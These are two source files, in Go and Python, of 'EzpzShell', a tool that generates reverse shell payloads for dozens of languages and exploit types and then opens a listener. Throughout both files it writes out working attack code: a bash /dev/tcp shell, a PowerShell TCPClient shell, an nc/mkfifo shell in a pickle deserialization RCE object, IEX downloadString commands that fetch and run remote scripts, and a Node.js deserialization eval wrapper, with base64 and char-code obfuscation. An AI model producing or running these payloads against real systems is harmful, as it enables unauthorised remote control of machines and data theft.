File: ezpzShell.go
//////////////////////////////////////////////////////////////////////
//Script Name	: EzpzShell
//Description	: Collection Of Reverse Shell that can easily generate
//Author       	: H0j3n
//Twitter       : @h0j3n
//Github Link   : https://github.com/H0j3n/EzpzShell
//////////////////////////////////////////////////////////////////////


package main

import (
	"fmt"
	"os"
	"net"
	"regexp"
	"strings"
	"io/ioutil"
	b64 "encoding/base64"
	"log"
	"io"
	"strconv"
	"golang.org/x/text/encoding/unicode"
	
)

//Color Variable
var colorReset = "\033[0m"
var colorRed = "\033[31m"
var colorGreen = "\033[32m"
var colorOrange = "\033[1;33;40m"
var colorBlue = "\033[34m"
var colorPurple = "\033[35m"
var colorCyan = "\033[92m"
var colorWhite = "\033[37m"

//Payload Variable
type payload struct {
	py string
	py3 string
	bash string
	c string
	nc string
	php string
	perl string
	ruby string
	haskell string
	powershell string
	nodejs string
	awk string
	ncat string
	exe string
	ssti string
	cgibin string
	jenkins string
	tarpriv string
	pickle string
	java string
	lua string
	xxe string
}


//Function Header
func header(){
	header := 
`
  ______               _____ _          _ _ 
 |  ____|             / ____| |        | | |
 | |__   _____ __ ___| (___ | |__   ___| | |
 |  __| |_  / '_ \_  /\___ \| '_ \ / _ \ | |
 | |____ / /| |_) / / ____) | | | |  __/ | |
 |______/___| .__/___|_____/|_| |_|\___|_|_|
            | |                             
            |_|
`
	fmt.Println(header)
	fmt.Print(string(colorCyan),"[Payload Available]",string(colorReset))
	fmt.Print("\npy,py3,bash,c,nc,php,perl,ruby,haskell,powershell,node,awk,ncat,exe,ssti,cgibin,jenkins,tarpriv,java,lua,asp,xxe,jsp,c#")
	
	fmt.Print("\n\n",string(colorCyan),"[Usage]",string(colorReset),"\n")
	fmt.Print(string(colorOrange),"ezpzShell 10.10.10.10 9001 py",string(colorReset),"\n")
	fmt.Print(string(colorOrange),"ezpzShell tun0 9001 py",string(colorReset))
}

//Function Load Shell
func loadShell(mapPayload map[string][]string, sliceData []string) {
	for i,data := range sliceData{
		if i == 0{
			mapPayload["py"] = append(mapPayload["py"],data)
		}else if i == 1{
			mapPayload["py3"] = append(mapPayload["py3"],data)
		}else if i == 2{
			mapPayload["bash"] = append(mapPayload["bash"],data)
		}else if i == 3{
			mapPayload["c"] = append(mapPayload["c"],data)
		}else if i == 4{
			mapPayload["nc"] = append(mapPayload["nc"],data)
		}else if i == 5{
			mapPayload["php"] = append(mapPayload["php"],data)
		}else if i == 6{
			mapPayload["perl"] = append(mapPayload["perl"],data)
		}else if i == 7{
			mapPayload["ruby"] = append(mapPayload["ruby"],data)
		}else if i == 8{
			mapPayload["haskell"] = append(mapPayload["haskell"],data)
		}else if i == 9{
			mapPayload["powershell"] = append(mapPayload["powershell"],data)
		}else if i == 10{
			mapPayload["node"] = append(mapPayload["nodejs"],data)
		}else if i == 11{
			mapPayload["awk"] = append(mapPayload["awk"],data)
		}else if i == 12{
			mapPayload["ncat"] = append(mapPayload["ncat"],data)
		}else if i == 13{
			mapPayload["exe"] = append(mapPayload["exe"],data)
		}else if i == 14{
			mapPayload["ssti"] = append(mapPayload["ssti"],data)
		}else if i == 15{
			mapPayload["cgibin"] = append(mapPayload["cgibin"],data)
		}else if i == 16{
			mapPayload["jenkins"] = append(mapPayload["jenkins"],data)
		}else if i == 17{
			mapPayload["tarpriv"] = append(mapPayload["tarpriv"],data)
		}else if i == 18{
			mapPayload["pickle"] = append(mapPayload["pickle"],data)
		}else if i == 19{
			mapPayload["java"] = append(mapPayload["java"],data)
		}else if i == 20{
			mapPayload["lua"] = append(mapPayload["lua"],data)
		}else if i == 21{
			mapPayload["asp"] = append(mapPayload["asp"],data)
		}else if i == 22{
			mapPayload["xxe"] = append(mapPayload["xxe"],data)
		}else if i == 23{
			mapPayload["jsp"] = append(mapPayload["jsp"],data)
		}else if i ==24{
			mapPayload["c#"] = append(mapPayload["c#"],data)
		}
	}
	return
}

//Function generate base64 bash
func base64gen(ip string, port string) string{
	temp := strings.Replace(strings.Replace("bash -i >& /dev/tcp/{IP}/{PORT} 0>&1","{PORT}",port,1),"{IP}",ip,1)
	encodeB64 := b64.StdEncoding.EncodeToString([]byte(temp))
	return encodeB64
	
}

//Function generate base64 ps1
func base64gen_ps1(ip string, port string) string{
	temp := strings.Replace(strings.Replace("$client = New-Object System.Net.Sockets.TCPClient(\"{IP}\",{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()","{PORT}",port,1),"{IP}",ip,1)
	//Encode to UTF16-LE (Little Endian)
	uni := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)
	encoded, _ := uni.NewEncoder().String(temp)
	encodeB64 := b64.StdEncoding.EncodeToString([]byte(encoded))
	return encodeB64
	
}

type list_emoji map[string]string
//Function PhpEmoji
func phpemoji(ip string, port string) (string,string){
	emoji := list_emoji{}
	emoji["0"]="$🙂"
	emoji["1"]="$😀"
	emoji["2"]="$😁"
	emoji["3"]="$😅"
	emoji["4"]="$😆"
	emoji["5"]="$😉"
	emoji["6"]="$😊"
	emoji["7"]="$😎"
	emoji["8"]="$😍"
	emoji["9"]="$😚"
	emoji["."]="$🤔"
	//New IP
	new_ip := ""
	for _, c := range ip {
		new_ip = new_ip + emoji[string(c)] + "."
	}
	//New PORT
	new_port := ""
	for _, c := range port {
		new_port = new_port + emoji[string(c)] + "."
	}
	return new_ip[:len(new_ip)-1],new_port[:len(new_port)-1]
}

//Function CharEncode
func charencode(payload string) string{
	fmt.Print("\n")
	temp := ""
	for i := 0; i < len(payload); i++ {
	    temp = temp + "," + strconv.Itoa(int(payload[i]))
	}
	return temp[1:]
}

//Function Listen Connection
func Listen(p string) {
	sock := ":" + p
	l, err := net.Listen("tcp", sock)
	if nil != err {
		log.Fatalf("Could not bind to interface: %v", err)
	}
	defer l.Close()
	log.Println("Listening on", l.Addr())
	for {
		c, err := l.Accept()
		if nil != err {
			log.Fatalf("Could not accept connection: %v", err)
		}
		log.Println("Accepted connection from", c.RemoteAddr())
		go io.Copy(c, os.Stdin)
		go io.Copy(os.Stdout, c)
	}
}

func main(){
	header()
	if (len(os.Args) < 4){
		fmt.Print("\n\nPlease Specify Correct Arguments!")
		os.Exit(1)
	}
	mapPayload := map[string][]string{}
	//FilePath
	filename := "/opt/Others/EzpzShell/shell.txt"
	//Regex For Ip Address
	re := regexp.MustCompile(`(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}`)
	
	port := os.Args[2]
	options := strings.ToLower(os.Args[3])
	//Check if interfaces specify available
	ip := os.Args[1]
	checkerip := re.MatchString(ip)
	
	if checkerip != true {
		interfaces,err := net.InterfaceByName(ip)
		if err != nil {
			fmt.Println("\nThe interface might not available! Check Again")
			os.Exit(1)
		}else{
			addr,err := interfaces.Addrs()
			if err != nil {
				fmt.Println("\nThe interface might not available! Check again")
				os.Exit(1)
			}
			ip = re.FindAllString(addr[0].String(),-1)[0]
		}
	}
	//Read File
	fileBytes, err := ioutil.ReadFile(filename)
	if err != nil{
		fmt.Println(err)
		os.Exit(1)
	}
	//Slice & Load Shell
	sliceData := strings.Split(string(fileBytes), "#INDEX")[1:]
	loadShell(mapPayload,sliceData)
	//Generate Shell
	for i,data := range strings.Split(string(mapPayload[options][0]), "#EXAMPLE")[1:]{
		fmt.Print("\n\n",string(colorCyan),"Example ",i+1,string(colorReset))
		if strings.Contains(data, "{BASE64}"){
			fmt.Print("\n",strings.TrimSpace(strings.Replace(strings.Replace(strings.Replace(data,"{BASE64}",base64gen(ip,port),1),"{IP}",ip,1),"{PORT}",port,1)))
			
		}else if strings.Contains(data, "{BASE64PS1}"){
			fmt.Print("\n",strings.TrimSpace(strings.Replace(strings.Replace(strings.Replace(data,"{BASE64PS1}",base64gen_ps1(ip,port),1),"{IP}",ip,1),"{PORT}",port,1)))
		}else if strings.Contains(data, "{PICKLE}"){
			fmt.Println("\nNot at the moment please use python version!")
		}else if strings.Contains(data, "{PHPEMOJI}"){
			new_ip,new_port := phpemoji(ip,port)
			fmt.Print("\n",strings.TrimSpace(strings.Replace(strings.Replace(strings.Replace(data,"{PHPEMOJI}","",1),"{IP}",new_ip,1),"{PORT}",new_port,1)))
		}else if strings.Contains(data, "{NODEJS_DESERIALIZATION}"){
			payloadN := charencode(strings.TrimSpace(strings.Replace(strings.Replace(strings.Replace(data,"{NODEJS_DESERIALIZATION}","",1),"{IP}",ip,1),"{PORT}",port,1)))
			s := fmt.Sprintf("\n{\"run\": \"_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()\"}",payloadN)
			fmt.Print(s)
			fmt.Print("\n\n",b64.StdEncoding.EncodeToString([]byte(s)))
		}else{
			fmt.Print("\n",strings.TrimSpace(strings.Replace(strings.Replace(data,"{IP}",ip,1),"{PORT}",port,1)))
		}
	}
	//Listen Netcat
	fmt.Print("\n\n",string(colorCyan),"Listening... ",string(colorReset),"\n")
        Listen(port)
	
	
	
}

File: ezpzShell.py
#!/usr/bin/python3
#coding=utf-8

######################################################################
#Script Name	: EzpzShell
#Description	: Collection Of Reverse Shell that can easily generate
#Author       	: H0j3n
#Twitter        : @h0j3n
#Github Link    : https://github.com/H0j3n/EzpzShell
######################################################################

import sys,re,os,base64,pickle,string,random
import netifaces as ni
from netifaces import AF_INET, AF_INET6, AF_LINK, AF_PACKET, AF_BRIDGE


class colors:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    CYAN = '\033[92m'
    GREEN = '\033[92m'
    RED = '\033[91m'
    RESET = '\033[0m'
    WHITEBOLD = '\033[1m'
    ORANGE = '\033[1;33;40m'

def header():
	listPayload = ','.join([i for i in sorted(payload.keys())])
	print('''
  ______               _____ _          _ _
 |  ____|             / ____| |        | | |
 | |__   _____ __ ___| (___ | |__   ___| | |
 |  __| |_  / '_ \_  /\___ \| '_ \ / _ \ | |
 | |____ / /| |_) / / ____) | | | |  __/ | |
 |______/___| .__/___|_____/|_| |_|\___|_|_|
            | |
            |_|'''+f'''\n\n{colors.CYAN}[Payload Available]
{colors.RESET}''')
	# Payload Listing
	counter = 0
	for i in listPayload.split(","):
		print(f"{colors.GREEN}[{colors.RESET}"+i+f"{colors.GREEN}]{colors.RESET}",end=" ")
		counter += 1
		if counter == 10:
			counter = 0
			print()
	print(f'''{colors.CYAN}
\n[Usage]\n{colors.ORANGE}\npython3 {sys.argv[0]} 10.10.10.10 9001 py\n{colors.ORANGE}python3 {sys.argv[0]} tun0 9001 py{colors.RESET}''')

def load_shell():
	listShell = open("/opt/Tools/EzpzShell/shell.txt").read()
	for counter,i in enumerate(str(listShell).split("#INDEX")[1:]):
		for j in i.split("#EXAMPLE")[1:]:
			payload[list(payload.keys())[counter]].append(j)

def base64gen(ip,port):
	temp = 'bash -i >& /dev/tcp/{IP}/{PORT} 0>&1'.replace("{IP}",ip).replace("{PORT}",port)
	return base64.b64encode(temp.encode('ascii'))

def base64gen_full(ip,port):
	temp = 'bash -i >& /dev/tcp/{IP}/{PORT} 0>&1'.replace("{IP}",ip).replace("{PORT}",port)
	full_temp = 'echo '+base64.b64encode(temp.encode('ascii')).decode('ascii')+' | base64 -d | bash'
	return base64.b64encode(full_temp.encode('ascii'))

def base64gen_ps1(ip,port):
	temp = '$client = New-Object System.Net.Sockets.TCPClient("{IP}",{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'.replace("{IP}",ip).replace("{PORT}",port)
	return base64.b64encode(temp.encode('UTF-16LE'))

def base64gen_ps1_2(ip,port):
	temp = '''IEX(New-Object Net.WebClient).downloadString('http://{IP}/Invoke-PowerShellTcp.ps1')'''.replace("{IP}",ip)
	return base64.b64encode(temp.encode('UTF-16LE'))

def base64gen_ps1_3(ip,port):
	temp = '''IEX(New-Object Net.WebClient).downloadString('http://{IP}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {IP} -Port {PORT}'''.replace("{IP}",ip).replace("{PORT}",port)
	return base64.b64encode(temp.encode('UTF-16LE'))

def phpemoji(ip,port):
	list_emoji = {
		"0":"$🙂",
		"1":"$😀",
		"2":"$😁",
		"3":"$😅",
		"4":"$😆",
		"5":"$😉",
		"6":"$😊",
		"7":"$😎",
		"8":"$😍",
		"9":"$😚",
		".":"$🤔"
	}
	new_ip = ""
	new_port = ""
	#Retrieve New IP
	for i in ip:
		new_ip += list_emoji[i]
		new_ip += "."
	#Retrieve New Port
	for i in port:
		new_port += list_emoji[i]
		new_port += "."
	return new_ip[:-1],new_port[:-1]

def pickle_rce(ip,port):
	command = f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {ip} {port}' + ' >/tmp/f'
	class rce(object):
		def __reduce__(self):
			import os
			return (os.system,(command,))
	return base64.b64encode(pickle.dumps(rce()))

def char_encode(payload):
	encoded_payload = ""
	for char in payload:
		encoded_payload = encoded_payload + "," + str(ord(char))
	return encoded_payload[1:]
	
def get_random_string():
	# choose from all lowercase letter
	letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
	result_str = ''.join(random.choice(letters) for i in range(20))
	return result_str

payload = {
	"py":[],
	"py3":[],
	"bash":[],
	"c":[],
	"nc":[],
	"php":[],
	"perl":[],
	"ruby":[],
	"haskell":[],
	"powershell":[],
	"node":[],
	"awk":[],
	"ncat":[],
	"msf_exe":[],
	"ssti":[],
	"cgibin":[],
	"jenkins":[],
	"tarpriv":[],
	"pickle":[],
	"java":[],
	"lua":[],
	"asp": [],
	"xxe": [],
	"jsp":[],
	"c#":[],
        "xsl":[],
        "yaml":[],
        "sql":[],
        "wordpress":[],
        "json.net":[],
        "msf_raw":[],
        "msf_dll":[],
        "msf_elf":[],
        "dag":[],
        "firebird":[],
}

if __name__ == "__main__":
	if len(sys.argv) < 4:
		header()
		sys.exit(-1)
	load_shell()
	options = sys.argv[3]
	port = sys.argv[2]
	ip = ""
	try:
		ip = ni.ifaddresses(sys.argv[1])[AF_INET][0]['addr']
	except:
		aa=re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",sys.argv[1])
		if aa:
			ip = sys.argv[1]
		else:
			print("\nCheck If IP is valid")
			ip = sys.argv[1]

	for counter,j in enumerate(payload[options.lower()]):
		print(f"\n{colors.GREEN}Example {counter+1}{colors.RESET}\n")
		if "{BASE64}" in j:
			temp = base64gen(ip,port)
			full_temp = j.strip().replace("{BASE64}",temp.decode("ascii")).replace("{IP}",ip).replace("{PORT}",port).strip()
			if "{YAML_PY}" in j:
				only_b64 = full_temp.replace("{YAML_PY}","")
				print(full_temp.replace("{YAML_PY}","Full Base64 Payload: "+base64.b64encode(only_b64.encode('ascii')).decode('ascii')))
			else:
				print(full_temp)
		elif "{BASE64_FULL}" in j:
			temp = base64gen_full(ip,port)
			full_temp = j.strip().replace("{BASE64_FULL}",temp.decode("ascii")).replace("{IP}",ip).replace("{PORT}",port).strip()
			if "{YAML_PY}" in j:
				only_b64 = full_temp.replace("{YAML_PY}","")
				print(full_temp.replace("{YAML_PY}","Full Base64 Payload: "+base64.b64encode(only_b64.encode('ascii')).decode('ascii')))
			else:
				print(full_temp)
		elif "{BASE64PS1}" in j:
			temp = base64gen_ps1(ip,port)
			print(j.strip().replace("{BASE64PS1}",temp.decode("ascii")).replace("{IP}",ip).replace("{PORT}",port).strip())
		elif "{BASE64PS1_2}" in j:
			temp = base64gen_ps1_2(ip,port)
			print(j.strip().replace("{BASE64PS1_2}",temp.decode("ascii")).replace("{IP}",ip).replace("{PORT}",port).strip())
		elif "{BASE64PS1_3}" in j:
			temp = base64gen_ps1_3(ip,port)
			print(j.strip().replace("{BASE64PS1_3}",temp.decode("ascii")).replace("{IP}",ip).replace("{PORT}",port).strip())
		elif "{PICKLE}" in j:
			temp = pickle_rce(ip,port)
			print(j.strip().replace("{PICKLE}",temp.decode("ascii")))
		elif "{PHPEMOJI}" in j:
			new_ip,new_port = phpemoji(ip,port)
			print(j.strip().replace("{PHPEMOJI}","").replace("{IP}",new_ip).replace("{PORT}",new_port).strip())
		elif "{RC4RANDOM}" in j:
			temprandom = get_random_string()
			print(j.strip().replace("{RC4RANDOM}",temprandom).replace("{IP}",ip).replace("{PORT}",port).strip())
		elif "{NODEJS_DESERIALIZATION}" in j:
			temp = j.strip().replace("{NODEJS_DESERIALIZATION}","").replace("{IP}",ip).replace("{PORT}",port).strip()
			temp2 = char_encode(temp)
			print('{"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}' % temp2)
			base64payload = '{"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}' % temp2
			print(f"\n{base64.b64encode(base64payload.encode('ascii')).decode('ascii')}")

		else:
			print(j.strip().replace("{IP}",ip).replace("{PORT}",port))
	print(F"\n{colors.CYAN}[*]{colors.RESET} {colors.WHITEBOLD}Starting the listener on {port}\n")
	os.system('nc -lvnp '+ str(port))
	print(colors.RESET)
